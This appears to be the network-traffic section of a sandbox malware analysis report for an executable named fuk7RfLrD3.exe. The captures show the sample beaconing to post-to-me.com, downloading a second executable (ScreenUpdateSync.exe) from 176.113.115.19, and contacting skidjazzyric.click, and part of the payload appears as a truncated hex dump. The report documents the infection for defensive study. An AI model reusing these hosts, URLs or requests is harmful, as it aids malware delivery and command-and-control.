Jan 9, 2025 08:33:44.422537088 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.422578096 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.422590017 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.422600985 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.422605991 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.422611952 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.422625065 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.422636986 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.422636986 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.422652960 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.422668934 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.422842979 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.422854900 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.422866106 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.422913074 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.422913074 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.422934055 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.422960997 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.422971010 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.422980070 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.422988892 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423002958 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423015118 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423031092 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423054934 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423054934 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423305035 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423321962 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423336983 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423348904 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423360109 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423365116 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423365116 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423372030 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423383951 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423397064 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423401117 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423409939 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423419952 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423419952 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423428059 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423461914 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423474073 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423660994 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423671961 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423682928 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423693895 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423707962 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423722029 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423741102 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423743963 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423743963 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423763990 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423775911 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423779964 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423787117 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423799038 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423810005 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423820972 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423835993 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423836946 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423861027 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.423862934 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423862934 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.423897028 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:44.462461948 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:44.462521076 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:45.585015059 CET	49768	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:45.585037947 CET	443	49768	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:45.585122108 CET	49768	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:45.588462114 CET	49768	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:45.588470936 CET	443	49768	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:46.077260971 CET	443	49768	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:46.077341080 CET	49768	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:46.099113941 CET	49768	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:46.099138021 CET	443	49768	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:46.099386930 CET	443	49768	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:46.147531986 CET	49768	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:46.147826910 CET	49768	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:46.147867918 CET	443	49768	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:46.547904015 CET	443	49768	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:46.548006058 CET	443	49768	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:46.548127890 CET	49768	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:46.601416111 CET	49768	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:46.601438999 CET	443	49768	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:46.645737886 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:46.645787001 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:46.645946026 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:46.646749020 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:46.646765947 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.122817993 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.122890949 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.165395021 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.165416002 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.165729046 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.168374062 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.168580055 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.168607950 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.629194975 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.629257917 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.629291058 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.629307032 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.629324913 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.629373074 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.629511118 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.629952908 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.629997969 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.629998922 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.630012035 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.630045891 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.630053997 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.630532026 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.630578041 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.630584955 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.681473017 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.681488991 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.719710112 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.719753027 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.719786882 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.719789028 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.719806910 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.719851017 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.719918966 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.720128059 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.720982075 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.720997095 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.721031904 CET	49775	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.721036911 CET	443	49775	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.984028101 CET	49785	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.984069109 CET	443	49785	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:47.984257936 CET	49785	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.984678030 CET	49785	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:47.984693050 CET	443	49785	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:48.448512077 CET	443	49785	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:48.448607922 CET	49785	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:48.451280117 CET	49785	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:48.451289892 CET	443	49785	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:48.451541901 CET	443	49785	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:48.453016043 CET	49785	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:48.453305960 CET	49785	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:48.453331947 CET	443	49785	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:49.015036106 CET	443	49785	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:49.015134096 CET	443	49785	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:49.019334078 CET	443	49785	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:49.019373894 CET	49785	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:49.025798082 CET	49785	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:49.064650059 CET	49785	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:49.064686060 CET	443	49785	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:49.294269085 CET	80	49753	176.113.115.19	192.168.2.7
Jan 9, 2025 08:33:49.301809072 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:33:49.516400099 CET	49796	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:49.516455889 CET	443	49796	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:49.516530991 CET	49796	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:49.516947031 CET	49796	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:49.516963959 CET	443	49796	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:49.974153996 CET	443	49796	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:49.974236965 CET	49796	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:49.975712061 CET	49796	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:49.975728035 CET	443	49796	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:49.976157904 CET	443	49796	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:49.977531910 CET	49796	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:49.977669954 CET	49796	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:49.977699041 CET	443	49796	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:49.977746964 CET	49796	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:50.019335985 CET	443	49796	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:50.490062952 CET	443	49796	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:50.490170956 CET	443	49796	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:50.490408897 CET	49796	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:50.490503073 CET	49796	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:50.490529060 CET	443	49796	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:50.734407902 CET	49803	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:50.734447002 CET	443	49803	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:50.734590054 CET	49803	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:50.735034943 CET	49803	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:50.735047102 CET	443	49803	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:51.197746992 CET	443	49803	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:51.197920084 CET	49803	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:51.199340105 CET	49803	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:51.199351072 CET	443	49803	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:51.199588060 CET	443	49803	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:51.201131105 CET	49803	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:51.201334000 CET	49803	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:51.201359034 CET	443	49803	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:51.201433897 CET	49803	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:51.201442003 CET	443	49803	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:51.827800989 CET	443	49803	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:51.827904940 CET	443	49803	104.21.80.1	192.168.2.7
Jan 9, 2025 08:33:51.828000069 CET	49803	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:51.828742027 CET	49803	443	192.168.2.7	104.21.80.1
Jan 9, 2025 08:33:51.828757048 CET	443	49803	104.21.80.1	192.168.2.7
Jan 9, 2025 08:35:32.121932030 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:35:32.432002068 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:35:33.041394949 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:35:34.244642019 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:35:36.650764942 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:35:41.463279009 CET	49753	80	192.168.2.7	176.113.115.19
Jan 9, 2025 08:35:51.088316917 CET	49753	80	192.168.2.7	176.113.115.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 08:33:34.740066051 CET	56075	53	192.168.2.7	1.1.1.1
Jan 9, 2025 08:33:42.129415035 CET	60769	53	192.168.2.7	1.1.1.1
Jan 9, 2025 08:33:42.143990040 CET	53	60769	1.1.1.1	192.168.2.7
Jan 9, 2025 08:33:45.563649893 CET	52925	53	192.168.2.7	1.1.1.1
Jan 9, 2025 08:33:45.576863050 CET	53	52925	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 9, 2025 08:33:34.740066051 CET	192.168.2.7	1.1.1.1	0x7b7f	Standard query (0)	time.windows.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:42.129415035 CET	192.168.2.7	1.1.1.1	0xfb08	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:45.563649893 CET	192.168.2.7	1.1.1.1	0x77cd	Standard query (0)	skidjazzyric.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 9, 2025 08:33:34.747262955 CET	1.1.1.1	192.168.2.7	0x7b7f	No error (0)	time.windows.com	twc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 08:33:34.960802078 CET	1.1.1.1	192.168.2.7	0x550d	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 9, 2025 08:33:34.960802078 CET	1.1.1.1	192.168.2.7	0x550d	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:42.143990040 CET	1.1.1.1	192.168.2.7	0xfb08	No error (0)	post-to-me.com		172.67.179.207	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:42.143990040 CET	1.1.1.1	192.168.2.7	0xfb08	No error (0)	post-to-me.com		104.21.56.70	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:45.576863050 CET	1.1.1.1	192.168.2.7	0x77cd	No error (0)	skidjazzyric.click		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:45.576863050 CET	1.1.1.1	192.168.2.7	0x77cd	No error (0)	skidjazzyric.click		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:45.576863050 CET	1.1.1.1	192.168.2.7	0x77cd	No error (0)	skidjazzyric.click		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:45.576863050 CET	1.1.1.1	192.168.2.7	0x77cd	No error (0)	skidjazzyric.click		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:45.576863050 CET	1.1.1.1	192.168.2.7	0x77cd	No error (0)	skidjazzyric.click		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:45.576863050 CET	1.1.1.1	192.168.2.7	0x77cd	No error (0)	skidjazzyric.click		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 9, 2025 08:33:45.576863050 CET	1.1.1.1	192.168.2.7	0x77cd	No error (0)	skidjazzyric.click		104.21.112.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

skidjazzyric.click

176.113.115.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49753	176.113.115.19	80	7812	C:\Users\user\Desktop\fuk7RfLrD3.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:33:43.224140882 CET	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.19
Jan 9, 2025 08:33:43.923346043 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 07:33:43 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Thu, 09 Jan 2025 07:30:02 GMT ETag: "53600-62b40f23d5dfc" Accept-Ranges: bytes Content-Length: 341504 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5a f6 05 ca 1e 97 6b 99 1e 97 6b 99 1e 97 6b 99 a3 d8 fd 99 1f 97 6b 99 00 c5 ef 99 3b 97 6b 99 00 c5 fe 99 00 97 6b 99 00 c5 e8 99 64 97 6b 99 39 51 10 99 1d 97 6b 99 1e 97 6a 99 6d 97 6b 99 00 c5 e1 99 1f 97 6b 99 00 c5 ff 99 1f 97 6b 99 00 c5 fa 99 1f 97 6b 99 52 69 63 68 1e 97 6b 99 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ab 7f f3 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 24 04 00 00 50 01 00 00 00 00 00 a5 5e 00 00 00 10 00 00 00 40 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 90 05 00 00 04 00 00 3f b1 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$Zkkkk;kkdk9QkjmkkkkRichkPELe$P^@@?*(hG@t.textV#$ `.data@`(@.rsrch@@
Jan 9, 2025 08:33:43.923362017 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 98 2c 04 00 aa 2c 04 00 c2 2c 04 00 d6 2c 04 00 ee 2c 04 00 02 2d 04 00 18 2d 04 00 2e 2d 04 00 42 2d 04 00 52 2d 04 00 62 2d Data Ascii: ,,,,,--.-B-R-b-r-------....>.P.`.p......../2/F/N/\/n/z///////0
Jan 9, 2025 08:33:43.923444986 CET	1236	IN	Data Raw: 1e 30 04 00 36 30 04 00 48 30 04 00 60 30 04 00 78 30 04 00 86 30 04 00 94 30 04 00 a0 30 04 00 ae 30 04 00 b8 30 04 00 ce 30 04 00 da 30 04 00 f0 30 04 00 18 31 04 00 32 31 04 00 4c 31 04 00 5e 31 04 00 6c 31 04 00 7a 31 04 00 94 31 04 00 a4 31 Data Ascii: 060H0`0x000000000121L1^1l1z1111111112222B2N2d2t2222222233"383H3h@y@@C@@@iA
Jan 9, 2025 08:33:43.923461914 CET	224	IN	Data Raw: 0a 00 00 00 53 49 4e 47 20 65 72 72 6f 72 0d 0a 00 00 00 00 44 4f 4d 41 49 4e 20 65 72 72 6f 72 0d 0a 00 00 52 36 30 33 34 0d 0a 41 6e 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 68 61 73 20 6d 61 64 65 20 61 6e 20 61 74 74 65 6d 70 74 20 74 6f 20 6c Data Ascii: SING errorDOMAIN errorR6034An application has made an attempt to load the C runtime library incorrectly.Please contact the application's support team for more information.R6033- Attempt to use MSIL
Jan 9, 2025 08:33:43.923475027 CET	1236	IN	Data Raw: 20 63 6f 64 65 20 66 72 6f 6d 20 74 68 69 73 20 61 73 73 65 6d 62 6c 79 20 64 75 72 69 6e 67 20 6e 61 74 69 76 65 20 63 6f 64 65 20 69 6e 69 74 69 61 6c 69 7a 61 74 69 6f 6e 0a 54 68 69 73 20 69 6e 64 69 63 61 74 65 73 20 61 20 62 75 67 20 69 6e Data Ascii: code from this assembly during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.R6032- not enough spa
Jan 9, 2025 08:33:43.923486948 CET	1236	IN	Data Raw: 04 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 92 00 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~=
Jan 9, 2025 08:33:43.923533916 CET	448	IN	Data Raw: 00 00 f2 3f 00 00 00 b4 91 72 eb 3f f6 8c ed 38 7b 4b 1c 3e 00 00 00 00 00 80 f2 3f 00 00 00 ec 70 de eb 3f 39 95 ba 6c fe 39 24 3e 00 00 00 00 00 00 f3 3f 00 00 00 bc 0a 47 ec 3f dc 61 6a 09 e8 69 39 3e 00 00 00 00 00 80 f3 3f 00 00 00 54 7c ac Data Ascii: ?r?8{K>?p?9l9$>?G?aji9>?T\|?'\\|#<>?$?}dj#>?Wn?MVx:>?,?18o,>?D$?c/>?@ \|?x7\|1>?\|?9>
Jan 9, 2025 08:33:43.923547029 CET	1236	IN	Data Raw: 1d 51 46 3e 00 00 00 00 00 80 fb 3f 00 00 00 2c 8f d3 f0 3f dd 23 2f a4 27 e8 16 3e 00 00 00 00 00 00 fc 3f 00 00 00 d8 a5 f2 f0 3f 5d 58 cd 63 02 ff 3f 3e 00 00 00 00 00 80 fc 3f 00 00 00 00 eb 10 f1 3f 08 d0 d4 ae 7d ce 1f 3e 00 00 00 00 00 00 Data Ascii: QF>?,?#/'>??]Xc?>??}>?e.?IdWA>?K??>?Xg?4A>?_?[J>??10H>??hc#]G>@,?QxF
Jan 9, 2025 08:33:43.923588037 CET	1236	IN	Data Raw: 00 00 00 04 b0 7b f4 3f 34 e6 8b d6 32 47 3c 3e 00 00 00 00 00 c0 0a 40 00 00 00 4c 1b 86 f4 3f c3 82 a9 fe e1 7c 2f 3e 00 00 00 00 00 00 0b 40 00 00 00 8c 59 90 f4 3f df fb c0 73 f1 0a 40 3e 00 00 00 00 00 40 0b 40 00 00 00 e0 6b 9a f4 3f d9 f0 Data Ascii: {?42G<>@L?\|/>@Y?s@>@@k?a@>@XS?x(3u8>@?vO,ib>@?&LC>@@?}L>@X?Lo>@x?-9>@
Jan 9, 2025 08:33:43.923602104 CET	448	IN	Data Raw: 2b 6f 46 3e 00 00 00 00 00 c0 13 40 00 00 00 24 7f f4 f5 3f 78 94 93 f8 12 04 4f 3e 00 00 00 00 00 e0 13 40 00 00 00 14 73 f9 f5 3f cb d5 9d 6d 85 54 32 3e 00 00 00 00 00 00 14 40 00 00 00 dc 57 fe f5 3f 87 de f0 04 85 3d 1a 3e 00 00 00 00 00 20 Data Ascii: +oF>@$?xO>@s?mT2>@W?=> @-?\=>@@?\==`@?j\&">@X?1D>>@?#O#`I>@?}0>@?F\IE
Jan 9, 2025 08:33:43.928401947 CET	1236	IN	Data Raw: 60 45 f6 3f 61 70 91 49 30 ae 48 3e 00 00 00 00 00 20 16 40 00 00 00 98 67 49 f6 3f a4 99 3a 9d d8 c3 2d 3e 00 00 00 00 00 40 16 40 00 00 00 ec 63 4d f6 3f a5 f2 25 15 51 12 0e 3e 00 00 00 00 00 60 16 40 00 00 00 40 55 51 f6 3f 4c 79 35 da 9a 6f Data Ascii: `E?apI0H> @gI?:->@@cM?%Q>`@@UQ?Ly5oE>@;U?vg0/>@Y?jvUG>@\?yK>@,`?A%My>@md?H> @ h?pM>@@0k

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49743	172.67.179.207	443	7812	C:\Users\user\Desktop\fuk7RfLrD3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 07:33:42 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
